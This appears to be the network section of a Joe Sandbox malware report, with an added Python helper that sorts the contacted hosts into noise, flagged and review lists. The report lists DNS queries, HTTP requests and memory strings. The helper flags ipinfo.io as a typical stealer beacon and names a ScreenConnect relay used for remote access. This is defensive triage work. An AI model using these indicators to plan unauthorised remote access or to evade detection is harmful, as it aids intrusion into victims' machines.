                             Source: global traffic | DNS traffic detected: DNS query: instance-pi5ke2-relay.screenconnect.com
                             Source: global traffic | DNS traffic detected: DNS query: ipinfo.io
                             Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
                             Source: global traffic | DNS traffic detected: DNS query: www.google.com
                             Source: global traffic | DNS traffic detected: DNS query: apis.google.com
                             Source: global traffic | DNS traffic detected: DNS query: play.google.com
                             Source: global traffic | DNS traffic detected: DNS query: beacons.gcp.gvt2.com
                             Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
                             Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
                             Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                             Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
                             Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
                             Source: global traffic | DNS traffic detected: DNS query: c.msn.com
                             Source: global traffic | DNS traffic detected: DNS query: api.msn.com
                             Source: unknown | HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1 | Host: play.google.com | Connection: keep-alive | Content-Length: 905 | sec-ch-ua-platform: "Windows" | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | Content-Type: application/x-www-form-urlencoded;charset=UTF-8 | sec-ch-ua-mobile: ?0 | Accept: */* | Origin: chrome-untrusted://new-tab-page | X-Client-Data: CIu2yQEIpbbJAQipncoBCJXkygEIlKHLAQiFoM0B | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Sec-Fetch-Storage-Access: active | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
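The rows in this section are two table columns, Source and detail, that text extraction frequently runs together, and the URLs carved from process memory further down carry trailing certificate-encoding bytes ("...com0A") or are cut short. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling: it parses both row shapes (fused, or separated with " | "), normalises the host, and sorts hosts into sandbox noise, hosts to flag, and hosts to review, attributing each host to the processes whose memory referenced it. The allowlist, the flagged set and the reasons attached to them are assumptions of this example drawn from this report, not verdicts Joe Sandbox emits; the sample rows are copied from the report.

```python
import re
from urllib.parse import urlparse

# One report row: the "Source" column and the detail column, which extraction may leave
# fused ("global trafficHTTP traffic detected") or separated with " | ".
ROW_RE = re.compile(
    r"^Source: (?P<source>.*?)\s*\|?\s*"
    r"(?P<kind>HTTP traffic detected|DNS traffic detected|String found in binary or memory): "
    r"(?P<detail>.*)$"
)
HOST_HDR_RE = re.compile(r"Host: ([a-z0-9.-]+)")  # fused headers: value ends at the next capital
DNS_RE = re.compile(r"DNS query: (\S+)")
# Longest prefix that still ends in an alphabetic TLD: drops the ASN.1 length byte that
# memory-carved certificate URLs carry ("ocsp.digicert.com0A") and trailing junk ("crl.ver)").
CLEAN_HOST_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}")

# Assumption of this example: a starting allowlist of what Windows, Office, Chrome and Firefox
# contact on their own in a sandbox (CRL/OCSP, captive-portal probes, telemetry, schema URIs).
BENIGN_SUFFIXES = {
    "digicert.com", "pki.goog", "windowsupdate.com", "detectportal.firefox.com",
    "msn.com", "google.com", "googleusercontent.com", "gvt2.com", "microsoft.com",
    "static.microsoft", "office.net", "live.com", "passport.net", "xmlsoap.org",
    "oasis-open.org", "w3.org", "cloudflare-dns.com", "scorecardresearch.com",
    "nelreports.net", "bingmapsportal.com", "wixtoolset.org", "nuget.org",
    "apache.org", "pesterbdd.com",
}
# Assumption of this example: hosts in this report an analyst should record, with the reason.
FLAGGED_SUFFIXES = {
    "ipinfo.io": "public IP lookup; typical first beacon of stealers and RATs",
    "screenconnect.com": "ScreenConnect relay; remote-access tool installed by the sample",
    "backblazeb2.com": "public object storage; verify what was downloaded from it",
}

# Constructed sample: rows copied from the report, in the raw fused form and the separated form.
REPORT_ROWS = """
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: f005.backblazeb2.com
Source: global trafficDNS traffic detected: DNS query: instance-pi5ke2-relay.screenconnect.com
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: unknown | HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1 | Host: play.google.com | Connection: keep-alive
Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instance-pi5ke2-relay.screenconnect.com:443/
Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: AddInProcess32.exe, 0000000C.00000002.6316208460.000000000127C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: svchost.exe, 00000003.00000002.3037260629.00000216C32E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
"""


def host_of(kind, detail):
    """Extract and normalise the contacted host from one row; None if the row has no host."""
    if kind == "DNS traffic detected":
        m = DNS_RE.search(detail)
        raw = m.group(1) if m else None
    elif kind == "HTTP traffic detected":
        m = HOST_HDR_RE.search(detail)
        raw = m.group(1) if m else None
    else:
        raw = urlparse(detail).hostname  # lower-cases and strips ":443"
    if not raw:
        return None
    m = CLEAN_HOST_RE.match(raw.lower())
    return m.group(0) if m else None


def classify(host):
    """Flagged suffixes win over benign ones; anything unknown goes to manual review."""
    for suffix, reason in FLAGGED_SUFFIXES.items():
        if host == suffix or host.endswith("." + suffix):
            return "flag", reason
    for suffix in BENIGN_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return "benign", "known platform or CA infrastructure"
    return "review", "not on either list"


def triage(report_text):
    """Group rows by normalised host: {host: {"verdict", "reason", "sources"}}."""
    out = {}
    for line in report_text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        host = host_of(m.group("kind"), m.group("detail"))
        if not host:
            continue
        verdict, reason = classify(host)
        entry = out.setdefault(host, {"verdict": verdict, "reason": reason, "sources": set()})
        # Keep process names only; the ".sdmp" tokens are memory-dump identifiers.
        entry["sources"].update(t for t in m.group("source").split(", ") if not t.endswith(".sdmp"))
    return out


def flagged_hosts(report_text):
    return sorted(h for h, e in triage(report_text).items() if e["verdict"] == "flag")


if __name__ == "__main__":
    for host, e in sorted(triage(REPORT_ROWS).items(), key=lambda kv: kv[1]["verdict"]):
        print(f'{e["verdict"]:7} {host:45} {sorted(e["sources"])}  {e["reason"]}')
```

Run against the full section, the flagged set is ipinfo.io (hit by the sample directly), the instance-pi5ke2-relay.screenconnect.com relay (referenced both in DNS and in ScreenConnect.ClientService.exe memory) and f005.backblazeb2.com; the DigiCert, Google PKI and windowsupdate.com entries are certificate-chain validation noise. Truncated strings such as http://microsoft.co or https://account.live land in "review" by design: the normaliser never guesses what a cut-off host was meant to be.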
                             Source: svchost.exe, 00000003.00000002.3037640058.00000216C4202000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/STS
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                             Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                             Source: powershell.exe, 0000000A.00000002.1377280322.00000238E5D3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mk7
                             Source: svchost.exe, 00000003.00000002.3037260629.00000216C32E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2867898626.000001D22A400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                             Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                             Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                             Source: AddInProcess32.exe, 0000000C.00000002.6316208460.000000000127C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                             Source: AddInProcess32.exe, 0000000C.00000002.6317687752.00000000012A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabn0
                             Source: svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                             Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:sam
                             Source: svchost.exe, 00000003.00000003.3035259067.00000216C3B10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                             Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
                             Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddre
                             Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.c
                             Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSe
                             Source: svchost.exe, 00000003.00000003.1173108728.00000216C3B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                             Source: svchost.exe, 00000004.00000003.1203610847.000001D22A600000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                             Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://instance-pi5ke2-relay.screenconnect.com:443/
                             Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://instance-pi5ke2-relay.screenconnect.com:443/Jc
                             Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002161000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.00000000021DE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002094000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002004000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002332000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002361000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002288000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://instance-pi5ke2-relay.screenconnect.com:443/d
                             Source: svchost.exe, 00000003.00000002.3037909746.00000216C425C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035930367.00000216C425A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co
                             Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
                             Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://passport.net/tb
                             Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                             Source: svchost.exe, 00000003.00000003.1171081299.00000216C3B0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171098971.00000216C3B0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
                             Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                             Source: svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                             Source: svchost.exe, 00000003.00000003.3034294653.00000216C3B39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                             Source: svchost.exe, 00000003.00000003.3034294653.00000216C3B39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034053258.00000216C3B65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                             Source: svchost.exe, 00000003.00000003.3034294653.00000216C3B39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034053258.00000216C3B65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                             Source: svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueags
                             Source: svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                             Source: svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuem
                             Source: svchost.exe, 00000003.00000003.3034684915.00000216C3B18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustce
                             Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                             Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
                             Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, powershell.exe, 0000000A.00000002.1341746632.00000238CD6E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000001F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                             Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                             Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239937892.0000000004B33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                             Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239937892.0000000004B33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wixtoolset.org/news/
                             Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239937892.0000000004B33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wixtoolset.org/releases/
                             Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                             Source: svchost.exe, 0000000D.00000002.1401294501.00000149EBA13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
                             Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
                             Source: powershell.exe, 0000000A.00000002.1370202958.00000238E58C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
